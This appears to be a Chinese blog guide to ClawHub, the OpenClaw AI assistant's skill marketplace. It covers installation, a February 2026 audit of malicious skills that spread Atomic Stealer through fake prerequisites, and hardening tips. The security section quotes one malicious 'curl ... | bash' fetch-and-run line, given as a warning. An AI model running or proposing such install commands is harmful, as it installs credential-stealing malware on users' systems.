一个拥有700+社区技能的市场，既是生产力倍增器，也潜藏着12%的恶意风险

前言

如果你正在使用OpenClaw（原ClawdBot/MoltBot）这个开源AI助手，那么ClawHub绝对是你不容错过的核心组件。简单来说，ClawHub就是OpenClaw生态系统的官方技能市场——就像iOS的App Store或Android的Google Play，为你的AI助手提供无限扩展能力。

但在你兴奋地准备安装各种神奇技能之前，我们需要先理解一个关键问题：这个开放生态既带来了无限可能，也引入了新的安全风险。2026年2月的安全审计显示，ClawHub上2857个技能中，有341个恶意技能（约12%）正在窃取用户数据。

本文将带你深入理解ClawHub的技术定位、核心功能、使用方式，并提供安全使用的最佳实践，让你既能享受AI自动化的便利，又能有效防范潜在风险。

官方地址：clawhub.ai
官方GitHub地址：github.com/openclaw/skills

以下是我在GitHub收集到高星整合文档
awesome-openclaw-skills：github.com/VoltAgent/awesome-openclaw-skills

一、历史脉络：从品牌混乱到统一生态

ClawHub的演变历程反映了整个OpenClaw生态的快速成长：

时间线	项目名称	状态
2025年11月	Clawd Bot / ClawdBot	初次发布，因与Anthropic的Claude商标冲突
2026年1月27日	MoltBot	紧急更名，意为"蜕壳的龙虾"
2026年1月30日	OpenClaw	现用名，强调开源特性
技能市场	ClawdHub → MoltHub → ClawHub	随主项目品牌同步调整

关键节点：2026年1月31日的CHANGELOG显示，官方已将技能市场从"ClawdHub"重新品牌为"ClawHub"，CLI命令也从clawdhub改为clawhub（旧命令仍兼容）。

现在两者统一使用"claw"品牌，历史名称（clawdhub/molthub）仍向后兼容，但新文档和代码已全面迁移到当前命名。不建议安装旧版clawdhub/molthub，以避免兼容性问题。

二、技术架构：OpenClaw与ClawHub的共生关系

理解两者的关系至关重要：

1. OpenClaw（核心平台）

• 本地运行的个人AI助手
• 提供24/7自动化能力：文件操作、终端命令、浏览器控制
• 支持多模型（Claude、GPT-4o、本地Ollama等）
• 通过50+通讯平台接收指令（WhatsApp、Telegram、Discord等）

2. ClawHub（技能市场）

• OpenClaw的官方公共注册表（Registry）
• 社区贡献技能的发现与安装中心
• 提供CLI工具：clawhub search、clawhub install、clawhub sync
• 目前托管约700+技能（2026年2月最新数据）

类比理解：OpenClaw就像操作系统，ClawHub就像应用商店。没有ClawHub，OpenClaw的能力是有限的；没有OpenClaw，ClawHub的技能也无处施展。

三、安装与使用：三种方式满足不同需求

方式一：自动安装（推荐）

直接在聊天界面让OpenClaw安装技能：

用户: "请基于clawhub安装web-scraper技能"
OpenClaw: "正在从ClawHub搜索并安装web-scraper..."

注意：要让OpenClaw基于ClawHub安装技能，方便后续统一管理配置。

方式二：CLI命令行安装

适合开发者和技术用户：

# 安装clawhub命令行工具
npm install -g clawhub

# 搜索技能
clawhub search "web scraping"

# 安装单个技能
clawhub install web-scraper

# 批量安装常用技能
clawhub install remind-me todo-tracker web-search weather

# 同步本地技能到市场
clawhub sync

# 探索热门技能
clawhub explore --sort trending

安装后的技能会集成到OpenClaw的~/.openclaw/skills/目录，并在对话中自动激活对应能力。

方式三：GUI界面安装

适合新手用户：

1. 启动Gateway服务：openclaw gateway
2. 打开控制面板：http://127.0.0.1:18789/
3. 进入Skills页面，搜索需要的技能
4. 点击Install按钮完成安装

四、安全风险：341个恶意技能的警示

2026年2月安全审计关键发现

Koi Security对ClawHub上2857个技能进行审计，发现：

1. 341个恶意技能（约12%）正在窃取用户数据
2. 335个技能使用虚假前置条件安装Atomic Stealer（AMOS）
3. 主要伪装为：
   • 加密货币工具（Solana钱包、Polymarket交易机器人）
   • YouTube实用程序（youtube-summarize-pro）
   • 自动更新工具（auto-updater-agent）
   • Google Workspace集成工具

攻击手法分析

攻击者利用"社会工程学+技术欺骗"的组合：

1. 虚假前置条件：技能文档中包含"Prerequisites"部分，要求用户先安装"必要的工具"
2. 平台针对性：特别针对macOS用户（很多人使用Mac Mini 24x7运行OpenClaw）
3. 延迟执行：利用OpenClaw的持久化内存特性，实施时间延迟攻击

恶意脚本示例：

# 看似正常的安装命令，实际下载恶意软件
curl -s https://glot[.]io/malicious.sh | bash

OpenClaw的应对措施

项目创建者Peter Steinberger已推出：

1. 举报功能：登录用户可标记可疑技能
2. 自动隐藏：收到3个以上独立举报的技能自动隐藏
3. 审核机制：正在建立更严格的技能审核流程

五、最佳实践：安全高效使用ClawHub

1. 技能选择原则

• 查星级与活跃度：优先选择高star数、近期有更新的技能
• 看维护记录：检查GitHub仓库的commit频率和issue响应
• 审阅文档：仔细阅读SKILL.md，特别警惕"Prerequisites"部分
• 社区验证：在OpenClaw社区论坛查看其他用户的反馈

2. 安全配置建议

# 使用沙箱模式运行高风险操作
openclaw config set security.sandbox true

# 限制技能的文件系统访问权限
openclaw config set skills.file_access "read-only"

# 启用操作审批流程
openclaw config set security.require_approval true

3. "装机必备"技能推荐

经过社区验证的安全实用技能：

1. remind-me：智能提醒，用自然语言设置定时任务
2. todo-tracker：待办清单管理，与通讯平台深度集成
3. web-search：联网搜索能力，让AI获取实时信息
4. newsletter-digest：文章摘要，解决信息过载问题
5. github-tools：开发者必备的GitHub管理工具

4. 技能组合使用示例

自动化内容创作流程：

用户: "监控GitHub Trending，发现有趣项目后生成分析文章，并添加到我的内容日历"
OpenClaw会：
1. 调用github-tools监控趋势项目
2. 使用web-search补充项目背景信息
3. 生成结构化分析报告
4. 通过notion-integration添加到内容日历

六、未来展望：技能生态的演进方向

1. 标准化进程

• SKILL.md规范：正在建立更严格的技能描述标准
• 依赖管理：统一的依赖声明和版本控制机制
• 安全审计：自动化安全扫描工具集成

2. 商业化探索

• 付费技能：优质技能的商业化变现路径
• 企业版：针对企业的私有技能市场
• 技能开发者计划：激励社区贡献者的奖励机制

3. 技术融合

• 多智能体协作：不同技能的组合与协同工作
• 边缘计算集成：与物联网设备的深度结合
• 区块链验证：技能来源的可信验证机制

总结

ClawHub代表了开源AI生态的一个缩影：无限的可能性伴随着相应的责任。700+社区技能展示了集体智慧的强大力量，但341个恶意技能也提醒我们保持警惕的必要性。

对于开发者来说，ClawHub是一个展示技术创造力的舞台；对于普通用户来说，它是提升工作效率的神奇工具箱。关键在于学会安全地使用这个生态：

• 始于信任，终于验证：对新技能保持开放态度，但务必进行基本验证
• 权限最小化：按照实际需要授予技能最小必要权限
• 持续学习：关注社区动态，及时更新安全知识

OpenClaw+ClawHub的组合正在重新定义"个人AI助手"的概念——从被动的问答工具，转变为主动执行复杂任务的数字员工。这个转变才刚刚开始，而你将决定它如何影响你的工作和生活。

在AI自动化的浪潮中，ClawHub既是桨，也是舵——它为你提供前进的动力，也给你把握方向的能力。明智地使用它，你将在这个新时代中占据先机。